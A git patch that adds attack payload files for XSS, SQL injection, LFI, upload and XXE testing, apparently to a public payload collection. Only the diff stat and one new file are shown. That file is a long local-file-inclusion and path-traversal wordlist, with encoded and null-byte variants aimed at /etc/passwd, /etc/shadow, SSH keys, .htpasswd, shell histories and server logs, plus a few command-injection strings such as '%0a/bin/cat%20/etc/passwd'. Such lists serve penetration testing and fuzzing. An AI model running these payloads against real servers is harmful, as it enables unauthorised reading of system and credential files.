From 94470a2544703c49f66dbfeff82dc7ca000b9637 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 4 Jun 2017 17:22:26 +0200 Subject: [PATCH] More payloads for XSS/SQL/LFI/Upload and XXE --- PHP include/JHADDIX_LFI.txt | 867 ++++++++++++++++++ .../Payloads/FUZZDB_GenericBlind.txt | 42 + SQL injection/Payloads/FUZZDB_MSSQL.txt | 17 + .../Payloads/FUZZDB_MSSQLEnumeration.txt | 15 + SQL injection/Payloads/FUZZDB_MYSQL.txt | 6 + .../Payloads/FUZZDB_MySQL_ReadLocalFiles.txt | 3 + .../FUZZDB_MySQL_SQLi_LoginBypass.txt | 8 + SQL injection/Payloads/FUZZDB_Oracle.txt | 56 ++ .../Payloads/FUZZDB_PostgresEnumeration.txt | 20 + SQL injection/Payloads/Generic_SQLi | 267 ++++++ SQL injection/Payloads/SQLi_Polyglots.txt | 2 + Template injections/JHADDIX_SSI_Injection.txt | 75 ++ .../Insecure Flash/xssproject.swf | Bin 0 -> 1053 bytes .../Metadata GIF/phpinfo-metadata.gif | Bin 0 -> 7420 bytes .../Metadata PNG/phpinfo-metadata.jpg | Bin 0 -> 76064 bytes .../PHP Extension/Shell.phpt | 1 + .../PHP Extension/phpinfo.jpg.php | 1 + .../PHP Extension/phpinfo.php | 1 + .../PHP Extension/phpinfo.php3 | 1 + .../PHP Extension/phpinfo.php4 | 1 + .../PHP Extension/phpinfo.php5 | 1 + .../PHP Extension/phpinfo.php7 | 1 + .../PHP Extension/phpinfo.phpt | 1 + .../PHP Extension/phpinfo.pht | 1 + .../PHP Extension/phpinfo.phtml | 1 + Upload insecure files/README.md | 19 +- .../BRUTELOGIC-XSS-BYPASS-STRINGS.txt | 17 + XSS injection/BRUTELOGIC-XSS-STRINGS.txt | 113 +++ XSS injection/Flash XSS.md | 8 - XSS injection/JHADDIX_XSS.txt | 110 +++ XSS injection/MarioXSSVectors.txt | 330 +++++++ XSS injection/Polyglot XSS.md | 19 - XSS injection/README.md | 53 +- XSS injection/RSNAKE_XSS.txt | 74 ++ XSS injection/Wrapper JS and Data XSS.md | 13 - XSS injection/XSS_Polyglots.txt | 14 + XXE injections/XXE_Fuzzing.txt | 48 + 37 files changed, 2145 insertions(+), 61 deletions(-) create mode 100644 PHP include/JHADDIX_LFI.txt create mode 100644 SQL injection/Payloads/FUZZDB_GenericBlind.txt create mode 100644 SQL injection/Payloads/FUZZDB_MSSQL.txt create mode 100644 SQL injection/Payloads/FUZZDB_MSSQLEnumeration.txt create mode 100644 SQL injection/Payloads/FUZZDB_MYSQL.txt create mode 100644 SQL injection/Payloads/FUZZDB_MySQL_ReadLocalFiles.txt create mode 100644 SQL injection/Payloads/FUZZDB_MySQL_SQLi_LoginBypass.txt create mode 100644 SQL injection/Payloads/FUZZDB_Oracle.txt create mode 100644 SQL injection/Payloads/FUZZDB_PostgresEnumeration.txt create mode 100644 SQL injection/Payloads/Generic_SQLi create mode 100644 SQL injection/Payloads/SQLi_Polyglots.txt create mode 100644 Template injections/JHADDIX_SSI_Injection.txt create mode 100644 Upload insecure files/Insecure Flash/xssproject.swf create mode 100644 Upload insecure files/Metadata GIF/phpinfo-metadata.gif create mode 100644 Upload insecure files/Metadata PNG/phpinfo-metadata.jpg create mode 100755 Upload insecure files/PHP Extension/Shell.phpt create mode 100644 Upload insecure files/PHP Extension/phpinfo.jpg.php create mode 100644 Upload insecure files/PHP Extension/phpinfo.php create mode 100644 Upload insecure files/PHP Extension/phpinfo.php3 create mode 100644 Upload insecure files/PHP Extension/phpinfo.php4 create mode 100644 Upload insecure files/PHP Extension/phpinfo.php5 create mode 100644 Upload insecure files/PHP Extension/phpinfo.php7 create mode 100644 Upload insecure files/PHP Extension/phpinfo.phpt create mode 100644 Upload insecure files/PHP Extension/phpinfo.pht create mode 100644 Upload insecure files/PHP Extension/phpinfo.phtml create mode 100644 XSS injection/BRUTELOGIC-XSS-BYPASS-STRINGS.txt create mode 100644 XSS injection/BRUTELOGIC-XSS-STRINGS.txt delete mode 100644 XSS injection/Flash XSS.md create mode 100644 XSS injection/JHADDIX_XSS.txt create mode 100644 XSS injection/MarioXSSVectors.txt delete mode 100644 XSS injection/Polyglot XSS.md create mode 100644 XSS injection/RSNAKE_XSS.txt delete mode 100644 XSS injection/Wrapper JS and Data XSS.md create mode 100644 XSS injection/XSS_Polyglots.txt create mode 100644 XXE injections/XXE_Fuzzing.txt diff --git a/PHP include/JHADDIX_LFI.txt b/PHP include/JHADDIX_LFI.txt new file mode 100644 index 0000000..6f10e3f --- /dev/null +++ b/PHP include/JHADDIX_LFI.txt @@ -0,0 +1,867 @@ +/.../.../.../.../.../ +\…..\\\…..\\\…..\\\ +%00../../../../../../etc/passwd +%00/etc/passwd%00 +%00../../../../../../etc/shadow +%00/etc/shadow%00 +%0a/bin/cat%20/etc/passwd +%0a/bin/cat%20/etc/shadow +/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 +%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 +%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 +%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini +/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini +/../../../../../../../../%2A +/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini +/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd +/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow +..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd +..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow +..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed +..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd +..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow +=3D “/..” . “%2f.. +..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini +admin/access_log +/admin/install.php +../../../administrator/inbox +/apache2/logs/access_log +/apache2/logs/access.log +/apache2/logs/error_log +/apache2/logs/error.log +/apache/logs/access_log +/apache/logs/access.log +../../../../../apache/logs/access.log +../../../../apache/logs/access.log +../../../apache/logs/access.log +../../apache/logs/access.log +../apache/logs/access.log +/apache/logs/error_log +/apache/logs/error.log +../../../../../apache/logs/error.log +../../../../apache/logs/error.log +../../../apache/logs/error.log +../../apache/logs/error.log +../apache/logs/error.log +/apache\php\php.ini +\\'/bin/cat%20/etc/passwd\\' +\\'/bin/cat%20/etc/shadow\\' +/.bash_history +/.bash_profile +/.bashrc +/../../../../../../../../bin/id| +/bin/php.ini +/boot/grub/grub.conf +/./././././././././././boot.ini +/../../../../../../../../../../../boot.ini +/..\../..\../..\../..\../..\../..\../boot.ini +/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini +..//..//..//..//..//boot.ini +../../../../../../../../../../../../boot.ini +../../boot.ini +..\../..\../..\../..\../boot.ini +..\../..\../boot.ini +..\..\..\..\..\..\..\..\..\..\boot.ini +\..\..\..\..\..\..\..\..\..\..\boot.ini +/../../../../../../../../../../../boot.ini%00 +../../../../../../../../../../../../boot.ini%00 +..\..\..\..\..\..\..\..\..\..\boot.ini%00 +/../../../../../../../../../../../boot.ini%00.html +/../../../../../../../../../../../boot.ini%00.jpg +/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd +..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini +/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd +/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow +c:\apache\logs\access.log +c:\apache\logs\error.log +c:\AppServ\MySQL +C:/boot.ini +C:\boot.ini +/C:/inetpub/ftproot/ +C:/inetpub/wwwroot/global.asa +C:\inetpub\wwwroot\global.asa +c:\inetpub\wwwroot\index.asp +/config.asp +../config.asp +config.asp +../config.inc.php +config.inc.php +../config.js +config.js +_config.php +../_config.php +../config.php +config.php +../_config.php%00 +../../../../../../../../conf/server.xml +/core/config.php +/C:\Program Files\ +c:\Program Files\Apache Group\Apache\logs\access.log +c:\Program Files\Apache Group\Apache\logs\error.log +/.cshrc +c:\System32\Inetsrv\metabase.xml +c:WINDOWS/system32/ +d:\AppServ\MySQL +database.asp +database.js +database.php +data.php +dbase.php a +db.php +../../../../../../../dev +/D:\Program Files\ +d:\System32\Inetsrv\metabase.xml +/etc/apache2/apache2.conf +/etc/apache2/conf/httpd.conf +/etc/apache2/httpd.conf +/etc/apache2/sites-available/default +/etc/apache2/vhosts.d/default_vhost.include +/etc/apache/apache.conf +/etc/apache/conf/httpd.conf +/etc/apache/httpd.conf +/etc/apt/sources.list +/etc/chrootUsers +/etc/crontab +/etc/defaultdomain +/etc/default/passwd +/etc/defaultrouter +/etc/fstab +/etc/ftpchroot +/etc/ftphosts +/etc/group +/etc/hostname.bge +/etc/hostname.ce0 +/etc/hostname.ce1 +/etc/hostname.ce2 +/etc/hostname.ce3 +/etc/hostname.dcelx0 +/etc/hostname.dcelx1 +/etc/hostname.dcelx2 +/etc/hostname.dcelx3 +/etc/hostname.dmfe0 +/etc/hostname.dmfe1 +/etc/hostname.dmfe2 +/etc/hostname.dmfe3 +/etc/hostname.dnet0 +/etc/hostname.dnet1 +/etc/hostname.dnet2 +/etc/hostname.dnet3 +/etc/hostname.ecn0 +/etc/hostname.ecn1 +/etc/hostname.ecn2 +/etc/hostname.ecn3 +/etc/hostname.elx0 +/etc/hostname.elx1 +/etc/hostname.elx2 +/etc/hostname.elx3 +/etc/hostname.elxl0 +/etc/hostname.elxl1 +/etc/hostname.elxl2 +/etc/hostname.elxl3 +/etc/hostname.eri0 +/etc/hostname.eri1 +/etc/hostname.eri2 +/etc/hostname.eri3 +/etc/hostname.ge0 +/etc/hostname.ge1 +/etc/hostname.ge2 +/etc/hostname.ge3 +/etc/hostname.hme0 +/etc/hostname.hme1 +/etc/hostname.hme2 +/etc/hostname.hme3 +/etc/hostname.ieef0 +/etc/hostname.ieef1 +/etc/hostname.ieef2 +/etc/hostname.ieef3 +/etc/hostname.iprb0 +/etc/hostname.iprb1 +/etc/hostname.iprb2 +/etc/hostname.iprb3 +/etc/hostname.le0 +/etc/hostname.le1 +/etc/hostname.le2 +/etc/hostname.le3 +/etc/hostname.lo +/etc/hostname.pcn0 +/etc/hostname.pcn1 +/etc/hostname.pcn2 +/etc/hostname.pcn3 +/etc/hostname.qfe0 +/etc/hostname.qfe1 +/etc/hostname.qfe2 +/etc/hostname.qfe3 +/etc/hostname.spwr0 +/etc/hostname.spwr1 +/etc/hostname.spwr2 +/etc/hostname.spwr3 +/etc/hosts +../../../../../../../../../../../../etc/hosts +../../../../../../../../../../../../etc/hosts%00 +/etc/hosts.allow +/etc/hosts.deny +/etc/hosts.equiv +/etc/http/conf/httpd.conf +/etc/httpd.conf +/etc/httpd/conf.d/php.conf +/etc/httpd/conf.d/squirrelmail.conf +/etc/httpd/conf.d/ssl.conf +/etc/httpd/conf/httpd.conf +/etc/httpd/httpd.conf +/etc/httpd/logs/acces_log +/etc/httpd/logs/acces.log +../../../../../../../etc/httpd/logs/acces_log +../../../../../../../etc/httpd/logs/acces.log +/etc/httpd/logs/access_log +/etc/httpd/logs/access.log +../../../../../etc/httpd/logs/access_log +../../../../../etc/httpd/logs/access.log +/etc/httpd/logs/error_log +/etc/httpd/logs/error.log +../../../../../../../etc/httpd/logs/error_log +../../../../../../../etc/httpd/logs/error.log +../../../../../etc/httpd/logs/error_log +../../../../../etc/httpd/logs/error.log +/etc/httpd/php.ini +/etc/http/httpd.conf +/etc/inetd.conf +/etc/init.d/apache +/etc/init.d/apache2 +/etc/issue +/etc/logrotate.d/ftp +/etc/logrotate.d/httpd +/etc/logrotate.d/proftpd +/etc/logrotate.d/vsftpd.log +/etc/mail/access +/etc/mailman/mm_cfg.py +/etc/make.conf +/etc/master.passwd +/etc/motd +/etc/my.cnf +/etc/mysql/my.cnf +/etc/netconfig +/etc/nsswitch.conf +/etc/opt/ipf/ipf.conf +/etc/opt/ipf/ipnat.conf +/./././././././././././etc/passwd +/../../../../../../../../../../etc/passwd +/../../../../../../../../../../etc/passwd^^ +/..\../..\../..\../..\../..\../..\../etc/passwd +/etc/passwd +../../../../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../etc/passwd +../../../../../../../../../../etc/passwd +../../../../../../../../../etc/passwd +../../../../../../../../etc/passwd +../../../../../../../etc/passwd +../../../../../../etc/passwd +../../../../../etc/passwd +../../../../etc/passwd +../../../etc/passwd +../../etc/passwd +../etc/passwd +..\..\..\..\..\..\..\..\..\..\etc\passwd +.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd +\..\..\..\..\..\..\..\..\..\..\etc\passwd +etc/passwd +/etc/passwd%00 +../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../etc/passwd%00 +../../../../../../../../../etc/passwd%00 +../../../../../../../../etc/passwd%00 +../../../../../../../etc/passwd%00 +../../../../../../etc/passwd%00 +../../../../../etc/passwd%00 +../../../../etc/passwd%00 +../../../etc/passwd%00 +../../etc/passwd%00 +../etc/passwd%00 +..\..\..\..\..\..\..\..\..\..\etc\passwd%00 +\..\..\..\..\..\..\..\..\..\..\etc\passwd%00 +/../../../../../../../../../../../etc/passwd%00.html +/../../../../../../../../../../../etc/passwd%00.jpg +../../../../../../etc/passwd&=%3C%3C%3C%3C +/etc/php4.4/fcgi/php.ini +/etc/php4/apache2/php.ini +/etc/php4/apache/php.ini +/etc/php4/cgi/php.ini +/etc/php5/apache2/php.ini +/etc/php5/apache/php.ini +/etc/php5/cgi/php.ini +/etc/php/apache2/php.ini +/etc/php/apache/php.ini +/etc/php/cgi/php.ini +/etc/php.d/dom.ini +/etc/php.d/gd.ini +/etc/php.d/imap.ini +/etc/php.d/json.ini +/etc/php.d/ldap.ini +/etc/php.d/mbstring.ini +/etc/php.d/mysqli.ini +/etc/php.d/mysql.ini +/etc/php.d/odbc.ini +/etc/php.d/pdo.ini +/etc/php.d/pdo_mysql.ini +/etc/php.d/pdo_odbc.ini +/etc/php.d/pdo_pgsql.ini +/etc/php.d/pdo_sqlite.ini +/etc/php.d/pgsql.ini +/etc/php.d/xmlreader.ini +/etc/php.d/xmlwriter.ini +/etc/php.d/xsl.ini +/etc/php.d/zip.ini +/etc/php.ini +/etc/php/php4/php.ini +/etc/php/php.ini +/etc/postfix/mydomains +/etc/proftp.conf +/etc/proftpd/modules.conf +/etc/protpd/proftpd.conf +/etc/pure-ftpd.conf +/etc/pureftpd.passwd +/etc/pureftpd.pdb +/etc/pure-ftpd/pure-ftpd.conf +/etc/pure-ftpd/pure-ftpd.pdb +/etc/pure-ftpd/pureftpd.pdb +/etc/release +/etc/resolv.conf +/etc/rpc +/etc/security/environ +/etc/security/failedlogin +/etc/security/group +/etc/security/lastlog +/etc/security/limits +/etc/security/passwd +/etc/security/user +/./././././././././././etc/shadow +/../../../../../../../../../../etc/shadow +/../../../../../../../../../../etc/shadow^^ +/..\../..\../..\../..\../..\../..\../etc/shadow +/etc/shadow +../../../../../../../../../../../../etc/shadow +..\..\..\..\..\..\..\..\..\..\etc\shadow +.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow +\..\..\..\..\..\..\..\..\..\..\etc\shadow +../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00 +../../../../../../../../../../../../etc/shadow%00 +..\..\..\..\..\..\..\..\..\..\etc\shadow%00 +\..\..\..\..\..\..\..\..\..\..\etc\shadow%00 +etc/shadow%00 +/etc/ssh/sshd_config +/etc/sudoers +/etc/syslog.conf +/etc/syslogd.conf +/etc/system +/etc/updatedb.conf +/etc/utmp +/etc/vfstab +/etc/vhcs2/proftpd/proftpd.conf +/etc/vsftpd.chroot_list +/etc/vsftpd.conf +/etc/vsftpd/vsftpd.conf +/etc/wtmp +/etc/wu-ftpd/ftpaccess +/etc/wu-ftpd/ftphosts +/etc/wu-ftpd/ftpusers +/.forward +/home2\bin\stable\apache\php.ini +/home/apache/conf/httpd.conf +/home/apache/httpd.conf +/home\bin\stable\apache\php.ini +/.htpasswd +.htpasswd +../.htpasswd +../install.php +install.php +../../../../../../../../../../../../localstart.asp +../../../../../../../../../../../../localstart.asp%00 +/log/miscDir/accesslog +/.logout +/logs/access_log +/logs/access.log +../../../../../logs/access.log +../../../../logs/access.log +../../../logs/access.log +../../logs/access.log +../logs/access.log +/logs/error_log +/logs/error.log +../../../../../logs/error.log +../../../../logs/error.log +../../../logs/error.log +../../logs/error.log +../logs/error.log +/logs/pure-ftpd.log +/master.passwd +member/.htpasswd +members/.htpasswd +/.netrc +/NetServer\bin\stable\apache\php.ini +/opt/apache2/conf/httpd.conf +/opt/apache/conf/httpd.conf +/opt/lampp/logs/access_log +/opt/lampp/logs/access.log +/opt/lampp/logs/error_log +/opt/lampp/logs/error.log +/opt/xampp/etc/php.ini +/opt/xampp/logs/access_log +/opt/xampp/logs/access.log +/opt/xampp/logs/error_log +/opt/xampp/logs/error.log +.pass +../.pass +pass.dat +passwd +/.passwd +.passwd +../.passwd +passwd.dat +/php4\php.ini +/php5\php.ini +/php\php.ini +/PHP\php.ini +/private/etc/httpd/httpd.conf +/private/etc/httpd/httpd.conf.default +/proc/cpuinfo +/proc/interrupts +/proc/loadavg +/proc/meminfo +/proc/mounts +/proc/net/arp +/proc/net/dev +/proc/net/route +/proc/net/tcp +/proc/partitions +/proc/self/cmdline +/proc/self/envron +/proc/version +/.profile +/Program Files\Apache Group\Apache2\conf\httpd.conf +/Program Files\Apache Group\Apache\conf\httpd.conf +/Program Files\Apache Group\Apache\logs\access.log +/Program Files\Apache Group\Apache\logs\error.log +/Program Files\xampp\apache\conf\httpd.conf +/../../../../pswd +/.rhosts +/root/.bash_history +/root/.bash_logut +root/.htpasswd +/root/.ksh_history +/root/.Xauthority +/.sh_history +/.shosts +/.ssh/authorized_keys +user/.htpasswd +../users.db.php +users.db.php +users/.htpasswd +/usr/apache2/conf/httpd.conf +/usr/apache/conf/httpd.conf +/usr/etc/pure-ftpd.conf +/usr/lib/cron/log +/usr/lib/php.ini +/usr/lib/php/php.ini +/usr/lib/security/mkuser.default +/usr/local/apache2/conf/httpd.conf +/usr/local/apache2/httpd.conf +/usr/local/apache2/logs/access_log +/usr/local/apache2/logs/access.log +/usr/local/apache2/logs/error_log +/usr/local/apache2/logs/error.log +/usr/local/apache/conf/httpd.conf +/usr/local/apache/conf/php.ini +/usr/local/apache/httpd.conf +/usr/local/apache/log +/usr/local/apache/logs +/usr/local/apache/logs/access_log +/usr/local/apache/logs/access_ log +/usr/local/apache/logs/access.log +/usr/local/apache/logs/access. log +../../../../../../../usr/local/apache/logs/access_ log +../../../../../../../usr/local/apache/logs/access. log +../../../../../usr/local/apache/logs/access_log +../../../../../usr/local/apache/logs/access.log +/usr/local/apache/logs/error_log +/usr/local/apache/logs/error.log +../../../../../../../usr/local/apache/logs/error_l og +../../../../../../../usr/local/apache/logs/error.l og +../../../../../usr/local/apache/logs/error_log +../../../../../usr/local/apache/logs/error.log +/usr/local/apps/apache2/conf/httpd.conf +/usr/local/apps/apache/conf/httpd.conf +/usr/local/cpanel/logs +/usr/local/cpanel/logs/access_log +/usr/local/cpanel/logs/error_log +/usr/local/cpanel/logs/license_log +/usr/local/cpanel/logs/login_log +/usr/local/cpanel/logs/stats_log +/usr/local/etc/apache2/conf/httpd.conf +/usr/local/etc/apache/conf/httpd.conf +/usr/local/etc/apache/vhosts.conf +/usr/local/etc/httpd/conf/httpd.conf +/usr/local/etc/httpd/logs/access_log +/usr/local/etc/httpd/logs/error_log +/usr/local/etc/php.ini +/usr/local/etc/pure-ftpd.conf +/usr/local/etc/pureftpd.pdb +/usr/local/httpd/conf/httpd.conf +/usr/local/lib/php.ini +/usr/local/php4/httpd.conf +/usr/local/php4/httpd.conf.php +/usr/local/php4/lib/php.ini +/usr/local/php5/httpd.conf +/usr/local/php5/httpd.conf.php +/usr/local/php5/lib/php.ini +/usr/local/php/httpd.conf +/usr/local/php/httpd.conf.php +/usr/local/php/lib/php.ini +/usr/local/pureftpd/etc/pure-ftpd.conf +/usr/local/pureftpd/etc/pureftpd.pdb +/usr/local/pureftpd/sbin/pure-config.pl +/usr/local/www/logs/thttpd_log +/usr/local/Zend/etc/php.ini +/usr/pkgsrc/net/pureftpd/ +/usr/ports/contrib/pure-ftpd/ +/usr/ports/ftp/pure-ftpd/ +/usr/ports/net/pure-ftpd/ +/usr/sbin/pure-config.pl +/usr/spool/lp/log +/usr/spool/mqueue/syslog +/var/adm +/var/adm/acct/sum/loginlog +/var/adm/aculog +/var/adm/aculogs +/var/adm/crash/unix +/var/adm/crash/vmcore +/var/adm/cron/log +/var/adm/dtmp +/var/adm/lastlog +/var/adm/lastlog/username +/var/adm/log/asppp.log +/var/adm/loginlog +/var/adm/log/xferlog +/var/adm/lp/lpd-errs +/var/adm/messages +/var/adm/pacct +/var/adm/qacct +/var/adm/ras/bootlog +/var/adm/ras/errlog +/var/adm/sulog +/var/adm/SYSLOG +/var/adm/utmp +/var/adm/utmpx +/var/adm/vold.log +/var/adm/wtmp +/var/adm/wtmpx +/var/adm/X0msgs +/var/apache/log +/var/apache/logs +/var/apache/logs/access_log +/var/apache/logs/error_log +/var/cpanel/cpanel.config +/var/cron/log +/var/lib/mlocate/mlocate.db +/var/lib/mysql/my.cnf +/var/local/www/conf/php.ini +/var/lock/samba +/var/log +/var/log/access_log +/var/log/access.log +../../../../../../../var/log/access_log +../../../../../../../var/log/access.log +../../../../../var/log/access_log +/var/log/acct +/var/log/apache2/access_log +/var/log/apache2/access.log +../../../../../../../var/log/apache2/access_log +../../../../../../../var/log/apache2/access.log +/var/log/apache2/error_log +/var/log/apache2/error.log +../../../../../../../var/log/apache2/error_log +../../../../../../../var/log/apache2/error.log +/var/log/apache/access_log +/var/log/apache/access.log +../../../../../../../var/log/apache/access_log +../../../../../../../var/log/apache/access.log +../../../../../var/log/apache/access_log +../../../../../var/log/apache/access.log +/var/log/apache/error_log +/var/log/apache/error.log +../../../../../../../var/log/apache/error_log +../../../../../../../var/log/apache/error.log +../../../../../var/log/apache/error_log +../../../../../var/log/apache/error.log +/var/log/apache-ssl/access.log +/var/log/apache-ssl/error.log +/var/log/auth +/var/log/authlog +/var/log/auth.log +/var/log/boot.log +/var/log/cron.log +/var/log/dmesg +/var/log/error_log +/var/log/error.log +../../../../../../../var/log/error_log +../../../../../../../var/log/error.log +../../../../../var/log/error_log +/var/log/exim_mainlog +/var/log/exim/mainlog +/var/log/exim_paniclog +/var/log/exim/paniclog +/var/log/exim_rejectlog +/var/log/exim/rejectlog +/var/log/ftplog +/var/log/ftp-proxy +/var/log/ftp-proxy/ftp-proxy.log +/var/log/httpd/ +/var/log/httpd/access_log +/var/log/httpd/access.log +../../../../../var/log/httpd/access_log +/var/log/httpd/error_log +/var/log/httpd/error.log +../../../../../var/log/httpd/error_log +/var/log/httpsd/ssl.access_log +/var/log/httpsd/ssl_log +/var/log/kern.log +/var/log/lastlog +/var/log/lighttpd +/var/log/maillog +/var/log/message +/var/log/messages +/var/log/mysqlderror.log +/var/log/mysqld.log +/var/log/mysql.log +/var/log/mysql/mysql-bin.log +/var/log/mysql/mysql.log +/var/log/mysql/mysql-slow.log +/var/log/ncftpd.errs +/var/log/ncftpd/misclog.txt +/var/log/news +/var/log/news.all +/var/log/news/news +/var/log/news/news.all +/var/log/news/news.crit +/var/log/news/news.err +/var/log/news/news.notice +/var/log/news/suck.err +/var/log/news/suck.notice +/var/log/poplog +/var/log/POPlog +/var/log/proftpd +/var/log/proftpd.access_log +/var/log/proftpd.xferlog +/var/log/proftpd/xferlog.legacy +/var/log/pureftpd.log +/var/log/pure-ftpd/pure-ftpd.log +/var/log/qmail +/var/log/qmail/ +/var/log/samba +/var/log/samba-log.%m +/var/log/secure +/var/log/smtpd +/var/log/spooler +/var/log/syslog +/var/log/telnetd +/var/log/thttpd_log +/var/log/utmp +/var/log/vsftpd.log +/var/log/wtmp +/var/log/xferlog +/var/log/yum.log +/var/lp/logs/lpNet +/var/lp/logs/lpsched +/var/lp/logs/requests +/var/mysql.log +/var/run/httpd.pid +/var/run/mysqld/mysqld.pid +/var/run/utmp +/var/saf/_log +/var/saf/port/log +/var/spool/errors +/var/spool/locks +/var/spool/logs +/var/spool/tmp +/var/www/conf/httpd.conf +/var/www/html/.htaccess +/var/www/localhost/htdocs/.htaccess +/var/www/log/access_log +/var/www/log/error_log +/../../var/www/logs/access_log +/var/www/logs/access_log +/var/www/logs/access.log +../../../../../../../var/www/logs/access_log +../../../../../../../var/www/logs/access.log +../../../../../var/www/logs/access.log +/var/www/logs/error_log +/var/www/logs/error.log +../../../../../../../var/www/logs/error_log +../../../../../../../var/www/logs/error.log +../../../../../var/www/logs/error_log +../../../../../var/www/logs/error.log +/var/www/sitename/htdocs/ +/var/www/vhosts/sitename/httpdocs/.htaccess +/var/www/web1/html/.htaccess +/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf +/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini +/Volumes/webBackup/opt/apache2/conf/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf.default +/web/conf/php.ini +/WINDOWS\php.ini +../../windows/win.ini +/WINNT\php.ini +/..\..\..\..\..\..\winnt\win.ini +/www/logs/proftpd.system.log +/xampp\apache\bin\php.ini +/.Xauthority +..2fapache2flogs2ferror.log +..2fapache2flogs2faccess.log +..2f..2fapache2flogs2ferror.log +..2f..2fapache2flogs2faccess.log +..2f..2f..2fapache2flogs2ferror.log +..2f..2f..2fapache2flogs2faccess.log +..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log +..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log +..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log +..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log +..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log +..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log +..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log +..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log +..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log +..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log +..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log +..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og +..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log +..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log 